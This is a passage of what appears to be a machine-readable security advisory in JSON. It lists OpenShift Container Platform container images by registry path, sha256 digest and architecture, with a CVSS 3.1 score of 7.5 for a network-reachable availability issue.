"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:cba938605fa4d8155605e1d2c7f44e28a207ae3598bab7734b3a1a040b77a5f6_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:d0a48ae20cfa183349ec8553bbc637edabddbf24e93e2b76bb923e7717c1e04d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:b1c69b59e2e76e656893421f737c8b1f8d502d3587cd2b806706d107a7662a33_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:fe5541791393041c291dd0d3acb199292e6918b749ece264a9f9665109bd659d_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:1dc3b36b6a5b09421efd52d6ca56fddb950fe28c70ea451dde4065c3aba92ac3_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:484586d2911e94e02a3d30ab8bea98aa2b2c8be35b0784d36e39d3dc9ecaf1a0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:d358700abe87cbc60cbc05dc55dea6e587ec491f18a85b5614456baced6e7b42_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:40d0817110413c9e17f33bb8def2492f3545ef7d1c6474be2384be67a18b615f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:c3a5e17391c03393841809dc48498309f0d5f0fceacd7665341a95f87d036fa2_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:dbb121e056625e3870bb63231347bb708645a184b0da3058774056bac9a03bb1_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:85b3c53bf2a8dba249c356e2e043baf1ee9ad0839e61a5a9bf19653cd2d74752_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:ac5b73f115696c32a73bad39cdbfba7d9bd7aba7f88846473c3b28c2c536a74d_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:01fe42bef62e141999ec7b9a9863393a676ea4abafdd00d12a09df44c4eca8fd_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:a3705e55c87d86e4c751cac5d17d63d5eb85fa4478d969dafe384c0cbcb5cfb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:c667f68f7b59b61cd2b185393c670cb35b9c5f56cb8d417b9cb51d95ee0272b4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:11f24e17e3fd1bcb25241c47d76bd3800593e9f4a493e7e545cbedcd1926da2d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:2f6107770f1fb82e40997b8c8f1dae0408f1317422386b8ad4ebc6c79efbe797_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:4b6872dc40d53d4657492e3e25592e98f7300cc543dc16a6d58ae78b74781416_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:843593a17636af6b6dae5f0e172ee2590414d093b3c53a5e8ef65de050890424_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:bdfe3cf241ac03b5c4003a9f9ee3e6369e4ecc298b9c6c9a7c24c9d938b06b1f_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f1daae683b8df5ea0e559e3acfdd53491bcf4fd589a129c70b77e6621480003e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:1e6aa292e001c7241399cbf5ca290e8fd58be92f58b0f5d194ea4d5fd38db82c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:29191caf2f01529eaac34d2f958b07c3998549def5918a38b5a4622c006e8fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a7cb08bfe6a43532c63adc5814799d5f05d9c70459522da53b86c625120ba27b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:69b04e6d42b12ede1cdfdeebef7d8a76fe5eda20f29c5e99f26cb1e0bc98cf8e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:6cd0a2b56a3dcb79dc0e77d21460e502080936cd9bb72ffc0b9217834b2f2508_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ada91f9ca5511960bf9186bbdf489e8702f5cd6b8dd3de904e99e4cd0cd27d02_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:f3348d2d5a03fcea547d437cdee0a412ae05e92d91c73fd864f06df6d0cf6e7c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:4af787e869ad4a769be66c220cfd4fe65da3addeec80a827c0fc3530465dec2e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:7ee4146f484104010f00c32163b617db387b277ce9f38ab0e1e474cbbb310638_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:358352e377bb3428a676e37d75c8194c5b321f871cb60612208baf074d5dd660_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:534b97046a6f7b420a88295ce95651c3dbdf6024ef13c6941ffc83f4880ae5f1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6e31b25a4ecbbf3b675741fab14b822a864fd52b95b889c3ce7f8fdfae57121c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:bb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:337f01cb3cd356b2f89a0bb2b22b046ba8fb471f360eced07e5354c77cd5daff_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6722e6c8692d3258b5bd1b9b1efb8e02928125d18d73d11259ee8f7f4f6f164f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:b42a26554907833993dd5c132f0eaf9577c9a022b7648d30ac67ae29b2eabc7b_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:5e98690d966f8b1870a076932f0abda2b19eb48a872f73d8ec53b07c8718f5c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:6d5eb52cc650f72ccea8a587d7c53766fcc82d17b3c1f6c4aff8a29c91071582_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:e301810ba7726631695c694571f4591744c4049d0fcf08fb7f65687385a5b77e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3c8d94356ae95f6f20cdd4ff993855d3522e3dc7f6eb8212eaa45a3ca360ae92_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:830c1cd0eabd63ccf8720de080e5afd1d4612df9953e7f15548c6939a5f0601f_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:a6b47f4a8b72a692def0cec90bfaf2fb9185554cd26697ba62a16f88dd4fca6c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:117f14d49f5795a607426d9dbb72410839476f8f05fa49a84b127d58335db632_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:32488f18b64730ec0984572eefce302c966c451d60876c3550583d388e367fbb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e9dd24555cc2b1e4b0d71a564ba0b1d6f6458ac4ae1ce1de599bb80732b5629f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:44d6bbb8472af382cbe22f01e99e242e5ca17b87bd8b559fc0acfd52ed22026d_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:741a9140d522d685da85e744f088722106e5e6ef5130bb58616a5ceafb7aa46e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:9d2512cf69eb26236309098cccc8a79f6ddde8948975658423746a5c87d9b13b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:52ea8e976c4493d18356056e776b27d0100b9ff1d13a7c1843b8bf1bb29af9fb_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:ad39a63a12fe1ed56751d25beeea1bce55f09fdb2a4435c3cab92518e6225c93_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:f6d1fe0fbb9865bab0af088baa9e941266d38697906ac041ec202a870a537810_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:01c38bdc45e61c8aae912c2811c052b3ae1ffd383265976b53e73405c5f6d14c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:79c9e0cd616983cf38b32c1606d9636f539975aa79b413ac9f06e0b336bd3d94_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:7dc3b09e9ef10304566de13cf3bee114d0671ea8306c42b94a9fa2ae45e00155_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:29a4d464b56fe5225919de5034798b970708e128b55e1ca7ddba53344e79778c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:4ed8ca355b2fa3e7f304a22aa347e1611bafc45ec3666a2f26693f093ccaad11_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:bd4827507f60faea220fc23b0c5e96852d6a0f264b1ab4244b0f3a6733aed226_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:0556a83b37f75836a6269c901f4fe9898dded7f04e8d4096d0b4ad09d53dfe90_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c0001b283485a536f3bc95ad9095564ca637bcfea44ce1139b285339586f1165_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:d24318c9fc02f5d9d2e6bab9ba9d9450b44cd40962349f555f3090ac519b9c15_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:484dd2472b2c56bbcf927cf1665a785d07057b40f2219f3d4c26a6febb9b6efe_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:934e5f00851d37ed1d324f0aca7fb32c584db8352c5a79b06ba0412469add29b_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-console-rhel9@sha256:ad4e1756a4e4703806818721c390347d06632762eb0613e34fdd9dff25122d93_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fd5caff02b551caf0a6246b803591de5b01a5ee5e4caf98f0bbc42003bb0ffbe_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:47fcac8f8d0002e0f7d66cc90f9f2768b9c9e713089ce281bc4c39532f9d8290_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:579ec95bfbafe095682fcd83739112440e59a65ca8aa09a0362e1c7ae13fa55e_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5d044d51008f938694e3ff32b0190bef0cfd717dc6373a988fc4b89522869736_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:5e53f158e380070656ae5fa0be5aab36f74188ca981aa6c523aead1d926bcfe8_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:9215463c548662202ddd125670b45d64f847595ffa540d6fe9cbb3482c5eabe0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:997da5aecef571f4733b9de7a23882decc79f3b1e121f9524cb58d5f0343a8b2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:0796012228b715b8d0b1f7f8a8716e5fcb8e1eef5b4c91c1b9aeb586764165a1_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:822b61d5af679d4040c7ae01495dd7f0ebc187a7c3aced2d7c70ed39d09f792d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:a66aa215d0b85dfb8f0809c7920a0616c0f9422c8101336311a0372e1599fac5_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3f75242f1c9a7f21c44291c7920f9de873e3f888c0848ceb868c93fc52cadf59_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:c691d971d54dfac8a3d2b4560df928887c0c42726ea53276acc6fd82796fe013_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e9c032f902b75cfdbcace74992f172093a13adf9a3e56fa863916acceb687f69_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:ed059e0a5fc89373a42df693cce41426035f587aa81cf2ac7986d3c3a74bc252_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:0c07c89d2e6ed9ee9f484ab11623fb55f6d9d6328bb59ac475b6b26e354f2fa4_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:b8ab622ccda9a36914c49e39c68bfb6bdb9a268e4564e40cc049f78b6995a40f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:ce1eb507f327c654614af04bf3cdfc16b958e4826f5aabc3c2d9ba94f4f2e55c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:8af34f7f4fb73551a98d986d0bb1e59beb3ff58fed5c0abcdf7fa4ff40697926_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:bdbd1f9f158d0a48d2cad324c3956c74d1820ae81f5db242a2b8573c271f0f0a_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f532fe57b2214b4cd215af2d9d34bb77d46eca74ae6dc96e6b6ce3df16f19ed0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:691b019fb05a753e814a5aba61569635318334e29f4a8bfee0ff0c0c33028978_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:8f1848090e84bf6b19b86185443f820c6f935582cdfadea3e197a6be044c51bc_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:3ee1daa00cc3c529cd0c1f6116694e2792f9384633084d0e2ec4d85fac6394f3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:7679a49d3de0c40c142457d4d5ff66e22d5dffaa563fd58227d92f7483239779_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:2818f7d8c47b51a811ff46e8d83146b50bdbe7657f89a11a19a3a9e262c40eb4_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f3906dd6b9a9de755e0f94b1cf9f38855ebc93b8d3bcb66330e86553b9a0a8c2_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:570296451ca687e24780c6e744043252477d343f01abbf293369d83f15abd62e_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:878321fdebbc4e97d882cf7b686243d5d3ac7ed26455a476213d489dafa44067_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:b7cbd857137605b98d4af1b4b34685efacf3eef3f7e6c9f60ef8266ae29656b4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:100687023e0bdfbf08cbce13b19dabdcb8c2b23db3d8c103b72091c76f95029f_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:6d3d645e051fcd005a3a0a07585ed9889ecdb8fef6eb655223eabf200f084030_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:8d95ee03d7ae5eed6b0f051341812973b5a9a5af0ebb78e290db44aa9fd63aea_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:49d30e3ca8d16ae71846bf12e11e2587df29d5c336b1c35cc4a30a80d655cf6e_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:84aeed4f507496f3e720a6d7f29b275bbb5927a6497d2fab4297c280f363f59c_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:d0f27efa05b636e158d326467493b4bbc37a33b9e9965f54d650544d63e3ef01_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:40b444fee41057654328f8d759492125f8ab93f80d937b00bd14f4f1c8426709_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:9d17eb13f9c4440fd39d57fff9e6dfd0c501a588d51ee4083f42afaf96118a8c_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:fa0b10e03c4eb82878aae6d798285a61db57b5cbf067f6e8b2787ef02508fa57_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:58f80f5145dc8e26cad376643dc01b4906f554c692cb6549ff75ac6d6651c4d5_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:776a77a7e19347c98d94ca93e932b5724a50bb3f742e480e7c280d26afb495a5_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c23d9b764dd40921bf9b06cfcddeb0aeb69debee263fd8220ad94931a9d074c0_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3ae7b9aeee5cfbc483740ab12ccfea870058aec11062863bb390798ff3512715_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:450ebeed9ae176a811c7be57d28cb1c257fb4a6ebdb1f74d2725ceb2d2584c21_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:4f54aacc484e51eebd471b1fe856929613e08e43c9eff0af3712e1f8f2a2d1f8_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:265c50f7fa75113825c43dc6b49f60a6811cbf519d41d967970b1febf3b899a3_arm64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:8493400910b85f1fa3fa320934ec2ba460410a5fa1e7271b749b833d3f246d4a_ppc64le",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:a3dd55efb46f98a95d7161c464253cbf2e7157446935df921e08c5037aaa3c6d_amd64",
"Red Hat OpenShift Container Platform 4.2:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
